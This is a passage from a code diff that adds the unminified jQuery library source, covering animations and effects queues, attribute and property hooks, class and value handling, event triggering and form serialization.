tick.elem; + } ), + tick = function() { + if ( stopped ) { + return false; + } + var currentTime = fxNow || createFxNow(), + remaining = Math.max( 0, animation.startTime + animation.duration - currentTime ), + + // Support: Android 2.3 only + // Archaic crash bug won't allow us to use `1 - ( 0.5 || 0 )` (#12497) + temp = remaining / animation.duration || 0, + percent = 1 - temp, + index = 0, + length = animation.tweens.length; + + for ( ; index < length; index++ ) { + animation.tweens[ index ].run( percent ); + } + + deferred.notifyWith( elem, [ animation, percent, remaining ] ); + + // If there's more to do, yield + if ( percent < 1 && length ) { + return remaining; + } + + // If this was an empty animation, synthesize a final progress notification + if ( !length ) { + deferred.notifyWith( elem, [ animation, 1, 0 ] ); + } + + // Resolve the animation and report its conclusion + deferred.resolveWith( elem, [ animation ] ); + return false; + }, + animation = deferred.promise( { + elem: elem, + props: jQuery.extend( {}, properties ), + opts: jQuery.extend( true, { + specialEasing: {}, + easing: jQuery.easing._default + }, options ), + originalProperties: properties, + originalOptions: options, + startTime: fxNow || createFxNow(), + duration: options.duration, + tweens: [], + createTween: function( prop, end ) { + var tween = jQuery.Tween( elem, animation.opts, prop, end, + animation.opts.specialEasing[ prop ] || animation.opts.easing ); + animation.tweens.push( tween ); + return tween; + }, + stop: function( gotoEnd ) { + var index = 0, + + // If we are going to the end, we want to run all the tweens + // otherwise we skip this part + length = gotoEnd ? animation.tweens.length : 0; + if ( stopped ) { + return this; + } + stopped = true; + for ( ; index < length; index++ ) { + animation.tweens[ index ].run( 1 ); + } + + // Resolve when we played the last frame; otherwise, reject + if ( gotoEnd ) { + deferred.notifyWith( elem, [ animation, 1, 0 ] ); + deferred.resolveWith( elem, [ animation, gotoEnd ] ); + } else { + deferred.rejectWith( elem, [ animation, gotoEnd ] ); + } + return this; + } + } ), + props = animation.props; + + propFilter( props, animation.opts.specialEasing ); + + for ( ; index < length; index++ ) { + result = Animation.prefilters[ index ].call( animation, elem, props, animation.opts ); + if ( result ) { + if ( isFunction( result.stop ) ) { + jQuery._queueHooks( animation.elem, animation.opts.queue ).stop = + result.stop.bind( result ); + } + return result; + } + } + + jQuery.map( props, createTween, animation ); + + if ( isFunction( animation.opts.start ) ) { + animation.opts.start.call( elem, animation ); + } + + // Attach callbacks from options + animation + .progress( animation.opts.progress ) + .done( animation.opts.done, animation.opts.complete ) + .fail( animation.opts.fail ) + .always( animation.opts.always ); + + jQuery.fx.timer( + jQuery.extend( tick, { + elem: elem, + anim: animation, + queue: animation.opts.queue + } ) + ); + + return animation; +} + +jQuery.Animation = jQuery.extend( Animation, { + + tweeners: { + "*": [ function( prop, value ) { + var tween = this.createTween( prop, value ); + adjustCSS( tween.elem, prop, rcssNum.exec( value ), tween ); + return tween; + } ] + }, + + tweener: function( props, callback ) { + if ( isFunction( props ) ) { + callback = props; + props = [ "*" ]; + } else { + props = props.match( rnothtmlwhite ); + } + + var prop, + index = 0, + length = props.length; + + for ( ; index < length; index++ ) { + prop = props[ index ]; + Animation.tweeners[ prop ] = Animation.tweeners[ prop ] || []; + Animation.tweeners[ prop ].unshift( callback ); + } + }, + + prefilters: [ defaultPrefilter ], + + prefilter: function( callback, prepend ) { + if ( prepend ) { + Animation.prefilters.unshift( callback ); + } else { + Animation.prefilters.push( callback ); + } + } +} ); + +jQuery.speed = function( speed, easing, fn ) { + var opt = speed && typeof speed === "object" ? jQuery.extend( {}, speed ) : { + complete: fn || !fn && easing || + isFunction( speed ) && speed, + duration: speed, + easing: fn && easing || easing && !isFunction( easing ) && easing + }; + + // Go to the end state if fx are off + if ( jQuery.fx.off ) { + opt.duration = 0; + + } else { + if ( typeof opt.duration !== "number" ) { + if ( opt.duration in jQuery.fx.speeds ) { + opt.duration = jQuery.fx.speeds[ opt.duration ]; + + } else { + opt.duration = jQuery.fx.speeds._default; + } + } + } + + // Normalize opt.queue - true/undefined/null -> "fx" + if ( opt.queue == null || opt.queue === true ) { + opt.queue = "fx"; + } + + // Queueing + opt.old = opt.complete; + + opt.complete = function() { + if ( isFunction( opt.old ) ) { + opt.old.call( this ); + } + + if ( opt.queue ) { + jQuery.dequeue( this, opt.queue ); + } + }; + + return opt; +}; + +jQuery.fn.extend( { + fadeTo: function( speed, to, easing, callback ) { + + // Show any hidden elements after setting opacity to 0 + return this.filter( isHiddenWithinTree ).css( "opacity", 0 ).show() + + // Animate to the value specified + .end().animate( { opacity: to }, speed, easing, callback ); + }, + animate: function( prop, speed, easing, callback ) { + var empty = jQuery.isEmptyObject( prop ), + optall = jQuery.speed( speed, easing, callback ), + doAnimation = function() { + + // Operate on a copy of prop so per-property easing won't be lost + var anim = Animation( this, jQuery.extend( {}, prop ), optall ); + + // Empty animations, or finishing resolves immediately + if ( empty || dataPriv.get( this, "finish" ) ) { + anim.stop( true ); + } + }; + doAnimation.finish = doAnimation; + + return empty || optall.queue === false ? + this.each( doAnimation ) : + this.queue( optall.queue, doAnimation ); + }, + stop: function( type, clearQueue, gotoEnd ) { + var stopQueue = function( hooks ) { + var stop = hooks.stop; + delete hooks.stop; + stop( gotoEnd ); + }; + + if ( typeof type !== "string" ) { + gotoEnd = clearQueue; + clearQueue = type; + type = undefined; + } + if ( clearQueue ) { + this.queue( type || "fx", [] ); + } + + return this.each( function() { + var dequeue = true, + index = type != null && type + "queueHooks", + timers = jQuery.timers, + data = dataPriv.get( this ); + + if ( index ) { + if ( data[ index ] && data[ index ].stop ) { + stopQueue( data[ index ] ); + } + } else { + for ( index in data ) { + if ( data[ index ] && data[ index ].stop && rrun.test( index ) ) { + stopQueue( data[ index ] ); + } + } + } + + for ( index = timers.length; index--; ) { + if ( timers[ index ].elem === this && + ( type == null || timers[ index ].queue === type ) ) { + + timers[ index ].anim.stop( gotoEnd ); + dequeue = false; + timers.splice( index, 1 ); + } + } + + // Start the next in the queue if the last step wasn't forced. + // Timers currently will call their complete callbacks, which + // will dequeue but only if they were gotoEnd. + if ( dequeue || !gotoEnd ) { + jQuery.dequeue( this, type ); + } + } ); + }, + finish: function( type ) { + if ( type !== false ) { + type = type || "fx"; + } + return this.each( function() { + var index, + data = dataPriv.get( this ), + queue = data[ type + "queue" ], + hooks = data[ type + "queueHooks" ], + timers = jQuery.timers, + length = queue ? queue.length : 0; + + // Enable finishing flag on private data + data.finish = true; + + // Empty the queue first + jQuery.queue( this, type, [] ); + + if ( hooks && hooks.stop ) { + hooks.stop.call( this, true ); + } + + // Look for any active animations, and finish them + for ( index = timers.length; index--; ) { + if ( timers[ index ].elem === this && timers[ index ].queue === type ) { + timers[ index ].anim.stop( true ); + timers.splice( index, 1 ); + } + } + + // Look for any animations in the old queue and finish them + for ( index = 0; index < length; index++ ) { + if ( queue[ index ] && queue[ index ].finish ) { + queue[ index ].finish.call( this ); + } + } + + // Turn off finishing flag + delete data.finish; + } ); + } +} ); + +jQuery.each( [ "toggle", "show", "hide" ], function( _i, name ) { + var cssFn = jQuery.fn[ name ]; + jQuery.fn[ name ] = function( speed, easing, callback ) { + return speed == null || typeof speed === "boolean" ? + cssFn.apply( this, arguments ) : + this.animate( genFx( name, true ), speed, easing, callback ); + }; +} ); + +// Generate shortcuts for custom animations +jQuery.each( { + slideDown: genFx( "show" ), + slideUp: genFx( "hide" ), + slideToggle: genFx( "toggle" ), + fadeIn: { opacity: "show" }, + fadeOut: { opacity: "hide" }, + fadeToggle: { opacity: "toggle" } +}, function( name, props ) { + jQuery.fn[ name ] = function( speed, easing, callback ) { + return this.animate( props, speed, easing, callback ); + }; +} ); + +jQuery.timers = []; +jQuery.fx.tick = function() { + var timer, + i = 0, + timers = jQuery.timers; + + fxNow = Date.now(); + + for ( ; i < timers.length; i++ ) { + timer = timers[ i ]; + + // Run the timer and safely remove it when done (allowing for external removal) + if ( !timer() && timers[ i ] === timer ) { + timers.splice( i--, 1 ); + } + } + + if ( !timers.length ) { + jQuery.fx.stop(); + } + fxNow = undefined; +}; + +jQuery.fx.timer = function( timer ) { + jQuery.timers.push( timer ); + jQuery.fx.start(); +}; + +jQuery.fx.interval = 13; +jQuery.fx.start = function() { + if ( inProgress ) { + return; + } + + inProgress = true; + schedule(); +}; + +jQuery.fx.stop = function() { + inProgress = null; +}; + +jQuery.fx.speeds = { + slow: 600, + fast: 200, + + // Default speed + _default: 400 +}; + + +// Based off of the plugin by Clint Helfers, with permission. +// https://web.archive.org/web/20100324014747/http://blindsignals.com/index.php/2009/07/jquery-delay/ +jQuery.fn.delay = function( time, type ) { + time = jQuery.fx ? jQuery.fx.speeds[ time ] || time : time; + type = type || "fx"; + + return this.queue( type, function( next, hooks ) { + var timeout = window.setTimeout( next, time ); + hooks.stop = function() { + window.clearTimeout( timeout ); + }; + } ); +}; + + +( function() { + var input = document.createElement( "input" ), + select = document.createElement( "select" ), + opt = select.appendChild( document.createElement( "option" ) ); + + input.type = "checkbox"; + + // Support: Android <=4.3 only + // Default value for a checkbox should be "on" + support.checkOn = input.value !== ""; + + // Support: IE <=11 only + // Must access selectedIndex to make default options select + support.optSelected = opt.selected; + + // Support: IE <=11 only + // An input loses its value after becoming a radio + input = document.createElement( "input" ); + input.value = "t"; + input.type = "radio"; + support.radioValue = input.value === "t"; +} )(); + + +var boolHook, + attrHandle = jQuery.expr.attrHandle; + +jQuery.fn.extend( { + attr: function( name, value ) { + return access( this, jQuery.attr, name, value, arguments.length > 1 ); + }, + + removeAttr: function( name ) { + return this.each( function() { + jQuery.removeAttr( this, name ); + } ); + } +} ); + +jQuery.extend( { + attr: function( elem, name, value ) { + var ret, hooks, + nType = elem.nodeType; + + // Don't get/set attributes on text, comment and attribute nodes + if ( nType === 3 || nType === 8 || nType === 2 ) { + return; + } + + // Fallback to prop when attributes are not supported + if ( typeof elem.getAttribute === "undefined" ) { + return jQuery.prop( elem, name, value ); + } + + // Attribute hooks are determined by the lowercase version + // Grab necessary hook if one is defined + if ( nType !== 1 || !jQuery.isXMLDoc( elem ) ) { + hooks = jQuery.attrHooks[ name.toLowerCase() ] || + ( jQuery.expr.match.bool.test( name ) ? boolHook : undefined ); + } + + if ( value !== undefined ) { + if ( value === null ) { + jQuery.removeAttr( elem, name ); + return; + } + + if ( hooks && "set" in hooks && + ( ret = hooks.set( elem, value, name ) ) !== undefined ) { + return ret; + } + + elem.setAttribute( name, value + "" ); + return value; + } + + if ( hooks && "get" in hooks && ( ret = hooks.get( elem, name ) ) !== null ) { + return ret; + } + + ret = jQuery.find.attr( elem, name ); + + // Non-existent attributes return null, we normalize to undefined + return ret == null ? undefined : ret; + }, + + attrHooks: { + type: { + set: function( elem, value ) { + if ( !support.radioValue && value === "radio" && + nodeName( elem, "input" ) ) { + var val = elem.value; + elem.setAttribute( "type", value ); + if ( val ) { + elem.value = val; + } + return value; + } + } + } + }, + + removeAttr: function( elem, value ) { + var name, + i = 0, + + // Attribute names can contain non-HTML whitespace characters + // https://html.spec.whatwg.org/multipage/syntax.html#attributes-2 + attrNames = value && value.match( rnothtmlwhite ); + + if ( attrNames && elem.nodeType === 1 ) { + while ( ( name = attrNames[ i++ ] ) ) { + elem.removeAttribute( name ); + } + } + } +} ); + +// Hooks for boolean attributes +boolHook = { + set: function( elem, value, name ) { + if ( value === false ) { + + // Remove boolean attributes when set to false + jQuery.removeAttr( elem, name ); + } else { + elem.setAttribute( name, name ); + } + return name; + } +}; + +jQuery.each( jQuery.expr.match.bool.source.match( /\w+/g ), function( _i, name ) { + var getter = attrHandle[ name ] || jQuery.find.attr; + + attrHandle[ name ] = function( elem, name, isXML ) { + var ret, handle, + lowercaseName = name.toLowerCase(); + + if ( !isXML ) { + + // Avoid an infinite loop by temporarily removing this function from the getter + handle = attrHandle[ lowercaseName ]; + attrHandle[ lowercaseName ] = ret; + ret = getter( elem, name, isXML ) != null ? + lowercaseName : + null; + attrHandle[ lowercaseName ] = handle; + } + return ret; + }; +} ); + + + + +var rfocusable = /^(?:input|select|textarea|button)$/i, + rclickable = /^(?:a|area)$/i; + +jQuery.fn.extend( { + prop: function( name, value ) { + return access( this, jQuery.prop, name, value, arguments.length > 1 ); + }, + + removeProp: function( name ) { + return this.each( function() { + delete this[ jQuery.propFix[ name ] || name ]; + } ); + } +} ); + +jQuery.extend( { + prop: function( elem, name, value ) { + var ret, hooks, + nType = elem.nodeType; + + // Don't get/set properties on text, comment and attribute nodes + if ( nType === 3 || nType === 8 || nType === 2 ) { + return; + } + + if ( nType !== 1 || !jQuery.isXMLDoc( elem ) ) { + + // Fix name and attach hooks + name = jQuery.propFix[ name ] || name; + hooks = jQuery.propHooks[ name ]; + } + + if ( value !== undefined ) { + if ( hooks && "set" in hooks && + ( ret = hooks.set( elem, value, name ) ) !== undefined ) { + return ret; + } + + return ( elem[ name ] = value ); + } + + if ( hooks && "get" in hooks && ( ret = hooks.get( elem, name ) ) !== null ) { + return ret; + } + + return elem[ name ]; + }, + + propHooks: { + tabIndex: { + get: function( elem ) { + + // Support: IE <=9 - 11 only + // elem.tabIndex doesn't always return the + // correct value when it hasn't been explicitly set + // https://web.archive.org/web/20141116233347/http://fluidproject.org/blog/2008/01/09/getting-setting-and-removing-tabindex-values-with-javascript/ + // Use proper attribute retrieval(#12072) + var tabindex = jQuery.find.attr( elem, "tabindex" ); + + if ( tabindex ) { + return parseInt( tabindex, 10 ); + } + + if ( + rfocusable.test( elem.nodeName ) || + rclickable.test( elem.nodeName ) && + elem.href + ) { + return 0; + } + + return -1; + } + } + }, + + propFix: { + "for": "htmlFor", + "class": "className" + } +} ); + +// Support: IE <=11 only +// Accessing the selectedIndex property +// forces the browser to respect setting selected +// on the option +// The getter ensures a default option is selected +// when in an optgroup +// eslint rule "no-unused-expressions" is disabled for this code +// since it considers such accessions noop +if ( !support.optSelected ) { + jQuery.propHooks.selected = { + get: function( elem ) { + + /* eslint no-unused-expressions: "off" */ + + var parent = elem.parentNode; + if ( parent && parent.parentNode ) { + parent.parentNode.selectedIndex; + } + return null; + }, + set: function( elem ) { + + /* eslint no-unused-expressions: "off" */ + + var parent = elem.parentNode; + if ( parent ) { + parent.selectedIndex; + + if ( parent.parentNode ) { + parent.parentNode.selectedIndex; + } + } + } + }; +} + +jQuery.each( [ + "tabIndex", + "readOnly", + "maxLength", + "cellSpacing", + "cellPadding", + "rowSpan", + "colSpan", + "useMap", + "frameBorder", + "contentEditable" +], function() { + jQuery.propFix[ this.toLowerCase() ] = this; +} ); + + + + + // Strip and collapse whitespace according to HTML spec + // https://infra.spec.whatwg.org/#strip-and-collapse-ascii-whitespace + function stripAndCollapse( value ) { + var tokens = value.match( rnothtmlwhite ) || []; + return tokens.join( " " ); + } + + +function getClass( elem ) { + return elem.getAttribute && elem.getAttribute( "class" ) || ""; +} + +function classesToArray( value ) { + if ( Array.isArray( value ) ) { + return value; + } + if ( typeof value === "string" ) { + return value.match( rnothtmlwhite ) || []; + } + return []; +} + +jQuery.fn.extend( { + addClass: function( value ) { + var classes, elem, cur, curValue, clazz, j, finalValue, + i = 0; + + if ( isFunction( value ) ) { + return this.each( function( j ) { + jQuery( this ).addClass( value.call( this, j, getClass( this ) ) ); + } ); + } + + classes = classesToArray( value ); + + if ( classes.length ) { + while ( ( elem = this[ i++ ] ) ) { + curValue = getClass( elem ); + cur = elem.nodeType === 1 && ( " " + stripAndCollapse( curValue ) + " " ); + + if ( cur ) { + j = 0; + while ( ( clazz = classes[ j++ ] ) ) { + if ( cur.indexOf( " " + clazz + " " ) < 0 ) { + cur += clazz + " "; + } + } + + // Only assign if different to avoid unneeded rendering. + finalValue = stripAndCollapse( cur ); + if ( curValue !== finalValue ) { + elem.setAttribute( "class", finalValue ); + } + } + } + } + + return this; + }, + + removeClass: function( value ) { + var classes, elem, cur, curValue, clazz, j, finalValue, + i = 0; + + if ( isFunction( value ) ) { + return this.each( function( j ) { + jQuery( this ).removeClass( value.call( this, j, getClass( this ) ) ); + } ); + } + + if ( !arguments.length ) { + return this.attr( "class", "" ); + } + + classes = classesToArray( value ); + + if ( classes.length ) { + while ( ( elem = this[ i++ ] ) ) { + curValue = getClass( elem ); + + // This expression is here for better compressibility (see addClass) + cur = elem.nodeType === 1 && ( " " + stripAndCollapse( curValue ) + " " ); + + if ( cur ) { + j = 0; + while ( ( clazz = classes[ j++ ] ) ) { + + // Remove *all* instances + while ( cur.indexOf( " " + clazz + " " ) > -1 ) { + cur = cur.replace( " " + clazz + " ", " " ); + } + } + + // Only assign if different to avoid unneeded rendering. + finalValue = stripAndCollapse( cur ); + if ( curValue !== finalValue ) { + elem.setAttribute( "class", finalValue ); + } + } + } + } + + return this; + }, + + toggleClass: function( value, stateVal ) { + var type = typeof value, + isValidValue = type === "string" || Array.isArray( value ); + + if ( typeof stateVal === "boolean" && isValidValue ) { + return stateVal ? this.addClass( value ) : this.removeClass( value ); + } + + if ( isFunction( value ) ) { + return this.each( function( i ) { + jQuery( this ).toggleClass( + value.call( this, i, getClass( this ), stateVal ), + stateVal + ); + } ); + } + + return this.each( function() { + var className, i, self, classNames; + + if ( isValidValue ) { + + // Toggle individual class names + i = 0; + self = jQuery( this ); + classNames = classesToArray( value ); + + while ( ( className = classNames[ i++ ] ) ) { + + // Check each className given, space separated list + if ( self.hasClass( className ) ) { + self.removeClass( className ); + } else { + self.addClass( className ); + } + } + + // Toggle whole class name + } else if ( value === undefined || type === "boolean" ) { + className = getClass( this ); + if ( className ) { + + // Store className if set + dataPriv.set( this, "__className__", className ); + } + + // If the element has a class name or if we're passed `false`, + // then remove the whole classname (if there was one, the above saved it). + // Otherwise bring back whatever was previously saved (if anything), + // falling back to the empty string if nothing was stored. + if ( this.setAttribute ) { + this.setAttribute( "class", + className || value === false ? + "" : + dataPriv.get( this, "__className__" ) || "" + ); + } + } + } ); + }, + + hasClass: function( selector ) { + var className, elem, + i = 0; + + className = " " + selector + " "; + while ( ( elem = this[ i++ ] ) ) { + if ( elem.nodeType === 1 && + ( " " + stripAndCollapse( getClass( elem ) ) + " " ).indexOf( className ) > -1 ) { + return true; + } + } + + return false; + } +} ); + + + + +var rreturn = /\r/g; + +jQuery.fn.extend( { + val: function( value ) { + var hooks, ret, valueIsFunction, + elem = this[ 0 ]; + + if ( !arguments.length ) { + if ( elem ) { + hooks = jQuery.valHooks[ elem.type ] || + jQuery.valHooks[ elem.nodeName.toLowerCase() ]; + + if ( hooks && + "get" in hooks && + ( ret = hooks.get( elem, "value" ) ) !== undefined + ) { + return ret; + } + + ret = elem.value; + + // Handle most common string cases + if ( typeof ret === "string" ) { + return ret.replace( rreturn, "" ); + } + + // Handle cases where value is null/undef or number + return ret == null ? "" : ret; + } + + return; + } + + valueIsFunction = isFunction( value ); + + return this.each( function( i ) { + var val; + + if ( this.nodeType !== 1 ) { + return; + } + + if ( valueIsFunction ) { + val = value.call( this, i, jQuery( this ).val() ); + } else { + val = value; + } + + // Treat null/undefined as ""; convert numbers to string + if ( val == null ) { + val = ""; + + } else if ( typeof val === "number" ) { + val += ""; + + } else if ( Array.isArray( val ) ) { + val = jQuery.map( val, function( value ) { + return value == null ? "" : value + ""; + } ); + } + + hooks = jQuery.valHooks[ this.type ] || jQuery.valHooks[ this.nodeName.toLowerCase() ]; + + // If set returns undefined, fall back to normal setting + if ( !hooks || !( "set" in hooks ) || hooks.set( this, val, "value" ) === undefined ) { + this.value = val; + } + } ); + } +} ); + +jQuery.extend( { + valHooks: { + option: { + get: function( elem ) { + + var val = jQuery.find.attr( elem, "value" ); + return val != null ? + val : + + // Support: IE <=10 - 11 only + // option.text throws exceptions (#14686, #14858) + // Strip and collapse whitespace + // https://html.spec.whatwg.org/#strip-and-collapse-whitespace + stripAndCollapse( jQuery.text( elem ) ); + } + }, + select: { + get: function( elem ) { + var value, option, i, + options = elem.options, + index = elem.selectedIndex, + one = elem.type === "select-one", + values = one ? null : [], + max = one ? index + 1 : options.length; + + if ( index < 0 ) { + i = max; + + } else { + i = one ? index : 0; + } + + // Loop through all the selected options + for ( ; i < max; i++ ) { + option = options[ i ]; + + // Support: IE <=9 only + // IE8-9 doesn't update selected after form reset (#2551) + if ( ( option.selected || i === index ) && + + // Don't return options that are disabled or in a disabled optgroup + !option.disabled && + ( !option.parentNode.disabled || + !nodeName( option.parentNode, "optgroup" ) ) ) { + + // Get the specific value for the option + value = jQuery( option ).val(); + + // We don't need an array for one selects + if ( one ) { + return value; + } + + // Multi-Selects return an array + values.push( value ); + } + } + + return values; + }, + + set: function( elem, value ) { + var optionSet, option, + options = elem.options, + values = jQuery.makeArray( value ), + i = options.length; + + while ( i-- ) { + option = options[ i ]; + + /* eslint-disable no-cond-assign */ + + if ( option.selected = + jQuery.inArray( jQuery.valHooks.option.get( option ), values ) > -1 + ) { + optionSet = true; + } + + /* eslint-enable no-cond-assign */ + } + + // Force browsers to behave consistently when non-matching value is set + if ( !optionSet ) { + elem.selectedIndex = -1; + } + return values; + } + } + } +} ); + +// Radios and checkboxes getter/setter +jQuery.each( [ "radio", "checkbox" ], function() { + jQuery.valHooks[ this ] = { + set: function( elem, value ) { + if ( Array.isArray( value ) ) { + return ( elem.checked = jQuery.inArray( jQuery( elem ).val(), value ) > -1 ); + } + } + }; + if ( !support.checkOn ) { + jQuery.valHooks[ this ].get = function( elem ) { + return elem.getAttribute( "value" ) === null ? "on" : elem.value; + }; + } +} ); + + + + +// Return jQuery for attributes-only inclusion + + +support.focusin = "onfocusin" in window; + + +var rfocusMorph = /^(?:focusinfocus|focusoutblur)$/, + stopPropagationCallback = function( e ) { + e.stopPropagation(); + }; + +jQuery.extend( jQuery.event, { + + trigger: function( event, data, elem, onlyHandlers ) { + + var i, cur, tmp, bubbleType, ontype, handle, special, lastElement, + eventPath = [ elem || document ], + type = hasOwn.call( event, "type" ) ? event.type : event, + namespaces = hasOwn.call( event, "namespace" ) ? event.namespace.split( "." ) : []; + + cur = lastElement = tmp = elem = elem || document; + + // Don't do events on text and comment nodes + if ( elem.nodeType === 3 || elem.nodeType === 8 ) { + return; + } + + // focus/blur morphs to focusin/out; ensure we're not firing them right now + if ( rfocusMorph.test( type + jQuery.event.triggered ) ) { + return; + } + + if ( type.indexOf( "." ) > -1 ) { + + // Namespaced trigger; create a regexp to match event type in handle() + namespaces = type.split( "." ); + type = namespaces.shift(); + namespaces.sort(); + } + ontype = type.indexOf( ":" ) < 0 && "on" + type; + + // Caller can pass in a jQuery.Event object, Object, or just an event type string + event = event[ jQuery.expando ] ? + event : + new jQuery.Event( type, typeof event === "object" && event ); + + // Trigger bitmask: & 1 for native handlers; & 2 for jQuery (always true) + event.isTrigger = onlyHandlers ? 2 : 3; + event.namespace = namespaces.join( "." ); + event.rnamespace = event.namespace ? + new RegExp( "(^|\\.)" + namespaces.join( "\\.(?:.*\\.|)" ) + "(\\.|$)" ) : + null; + + // Clean up the event in case it is being reused + event.result = undefined; + if ( !event.target ) { + event.target = elem; + } + + // Clone any incoming data and prepend the event, creating the handler arg list + data = data == null ? + [ event ] : + jQuery.makeArray( data, [ event ] ); + + // Allow special events to draw outside the lines + special = jQuery.event.special[ type ] || {}; + if ( !onlyHandlers && special.trigger && special.trigger.apply( elem, data ) === false ) { + return; + } + + // Determine event propagation path in advance, per W3C events spec (#9951) + // Bubble up to document, then to window; watch for a global ownerDocument var (#9724) + if ( !onlyHandlers && !special.noBubble && !isWindow( elem ) ) { + + bubbleType = special.delegateType || type; + if ( !rfocusMorph.test( bubbleType + type ) ) { + cur = cur.parentNode; + } + for ( ; cur; cur = cur.parentNode ) { + eventPath.push( cur ); + tmp = cur; + } + + // Only add window if we got to document (e.g., not plain obj or detached DOM) + if ( tmp === ( elem.ownerDocument || document ) ) { + eventPath.push( tmp.defaultView || tmp.parentWindow || window ); + } + } + + // Fire handlers on the event path + i = 0; + while ( ( cur = eventPath[ i++ ] ) && !event.isPropagationStopped() ) { + lastElement = cur; + event.type = i > 1 ? + bubbleType : + special.bindType || type; + + // jQuery handler + handle = ( + dataPriv.get( cur, "events" ) || Object.create( null ) + )[ event.type ] && + dataPriv.get( cur, "handle" ); + if ( handle ) { + handle.apply( cur, data ); + } + + // Native handler + handle = ontype && cur[ ontype ]; + if ( handle && handle.apply && acceptData( cur ) ) { + event.result = handle.apply( cur, data ); + if ( event.result === false ) { + event.preventDefault(); + } + } + } + event.type = type; + + // If nobody prevented the default action, do it now + if ( !onlyHandlers && !event.isDefaultPrevented() ) { + + if ( ( !special._default || + special._default.apply( eventPath.pop(), data ) === false ) && + acceptData( elem ) ) { + + // Call a native DOM method on the target with the same name as the event. + // Don't do default actions on window, that's where global variables be (#6170) + if ( ontype && isFunction( elem[ type ] ) && !isWindow( elem ) ) { + + // Don't re-trigger an onFOO event when we call its FOO() method + tmp = elem[ ontype ]; + + if ( tmp ) { + elem[ ontype ] = null; + } + + // Prevent re-triggering of the same event, since we already bubbled it above + jQuery.event.triggered = type; + + if ( event.isPropagationStopped() ) { + lastElement.addEventListener( type, stopPropagationCallback ); + } + + elem[ type ](); + + if ( event.isPropagationStopped() ) { + lastElement.removeEventListener( type, stopPropagationCallback ); + } + + jQuery.event.triggered = undefined; + + if ( tmp ) { + elem[ ontype ] = tmp; + } + } + } + } + + return event.result; + }, + + // Piggyback on a donor event to simulate a different one + // Used only for `focus(in | out)` events + simulate: function( type, elem, event ) { + var e = jQuery.extend( + new jQuery.Event(), + event, + { + type: type, + isSimulated: true + } + ); + + jQuery.event.trigger( e, null, elem ); + } + +} ); + +jQuery.fn.extend( { + + trigger: function( type, data ) { + return this.each( function() { + jQuery.event.trigger( type, data, this ); + } ); + }, + triggerHandler: function( type, data ) { + var elem = this[ 0 ]; + if ( elem ) { + return jQuery.event.trigger( type, data, elem, true ); + } + } +} ); + + +// Support: Firefox <=44 +// Firefox doesn't have focus(in | out) events +// Related ticket - https://bugzilla.mozilla.org/show_bug.cgi?id=687787 +// +// Support: Chrome <=48 - 49, Safari <=9.0 - 9.1 +// focus(in | out) events fire after focus & blur events, +// which is spec violation - http://www.w3.org/TR/DOM-Level-3-Events/#events-focusevent-event-order +// Related ticket - https://bugs.chromium.org/p/chromium/issues/detail?id=449857 +if ( !support.focusin ) { + jQuery.each( { focus: "focusin", blur: "focusout" }, function( orig, fix ) { + + // Attach a single capturing handler on the document while someone wants focusin/focusout + var handler = function( event ) { + jQuery.event.simulate( fix, event.target, jQuery.event.fix( event ) ); + }; + + jQuery.event.special[ fix ] = { + setup: function() { + + // Handle: regular nodes (via `this.ownerDocument`), window + // (via `this.document`) & document (via `this`). + var doc = this.ownerDocument || this.document || this, + attaches = dataPriv.access( doc, fix ); + + if ( !attaches ) { + doc.addEventListener( orig, handler, true ); + } + dataPriv.access( doc, fix, ( attaches || 0 ) + 1 ); + }, + teardown: function() { + var doc = this.ownerDocument || this.document || this, + attaches = dataPriv.access( doc, fix ) - 1; + + if ( !attaches ) { + doc.removeEventListener( orig, handler, true ); + dataPriv.remove( doc, fix ); + + } else { + dataPriv.access( doc, fix, attaches ); + } + } + }; + } ); +} +var location = window.location; + +var nonce = { guid: Date.now() }; + +var rquery = ( /\?/ ); + + + +// Cross-browser xml parsing +jQuery.parseXML = function( data ) { + var xml; + if ( !data || typeof data !== "string" ) { + return null; + } + + // Support: IE 9 - 11 only + // IE throws on parseFromString with invalid input. + try { + xml = ( new window.DOMParser() ).parseFromString( data, "text/xml" ); + } catch ( e ) { + xml = undefined; + } + + if ( !xml || xml.getElementsByTagName( "parsererror" ).length ) { + jQuery.error( "Invalid XML: " + data ); + } + return xml; +}; + + +var + rbracket = /\[\]$/, + rCRLF = /\r?\n/g, + rsubmitterTypes = /^(?:submit|button|image|reset|file)$/i, + rsubmittable = /^(?:input|select|textarea|keygen)/i; + +function buildParams( prefix, obj, traditional, add ) { + var name; + + if ( Array.isArray( obj ) ) { + + // Serialize array item. + jQuery.each( obj, function( i, v ) { + if ( traditional || rbracket.test( prefix ) ) { + + // Treat each array item as a scalar. + add( prefix, v ); + + } else { + + // Item is non-scalar (array or object), encode its numeric index. + buildParams( + prefix + "[" + ( typeof v === "object" && v != null ? i : "" ) + "]", + v, + traditional, + add + ); + } + } ); + + } else if ( !traditional && toType( obj ) === "object" ) { + + // Serialize object item. + for ( name in obj ) { + buildParams( prefix + "[" + name + "]", obj[ name ], traditional, add ); + } + + } else { + + // Serialize scalar item. + add( prefix, obj ); + } +} + +// Serialize an array of form elements or a set of +// key/values into a query string +jQuery.param = function( a, traditional ) { + var prefix, + s = [], + add = function( key, valueOrFunction ) { + + // If value is a function, invoke it and use its return value + var value = isFunction( valueOrFunction ) ? + valueOrFunction() : + valueOrFunction; + + s[ s.length ] = encodeURIComponent( key ) + "=" + + encodeURIComponent( value == null ? "" : value ); + }; + + if ( a == null ) { + return ""; + } + + // If an array was passed in, assume that it is an array of form elements. + if ( Array.isArray( a ) || ( a.jquery && !jQuery.isPlainObject( a ) ) ) { + + // Serialize the form elements + jQuery.each( a, function() { + add( this.name, this.value ); + } ); + + } else { + + // If traditional, encode the "old" way (the way 1.3.2 or older + // did it), otherwise encode params recursively. + for ( prefix in a ) { + buildParams( prefix, a[ prefix ], traditional, add ); + } + } + + // Return the resulting serialization + return s.join( "&" ); +}; + +jQuery.fn.extend( { + serialize: function() { + return jQuery.param( this.serializeArray() ); + }, + serializeArray: function() { + return this.map( function() { + + // Can add propHook for "elements" to filter or add form elements + var elements = jQuery.prop( this, "elements" ); + return elements ? jQuery.makeArray( elements ) : this; + } ) + .filter( function() { + var type = this.type; + + // Use .is( ":disabled" ) so that fieldset[disabled] works + return this.name && !jQuery( this ).is( ":disabled" ) && + rsubmittable.test( this.nodeName ) && !rsubmitterTypes.test( type ) && + ( this.checked || !rcheckableType.test( type ) ); + } ) + .map( function( _i, elem ) { + var val = jQuery( this ).val(); + + if ( val == null ) { + return null; + } + + if ( Array.isArray( val ) ) { + return jQuery.map( val, function( val ) { + return { name: elem.name, value: val.replace( 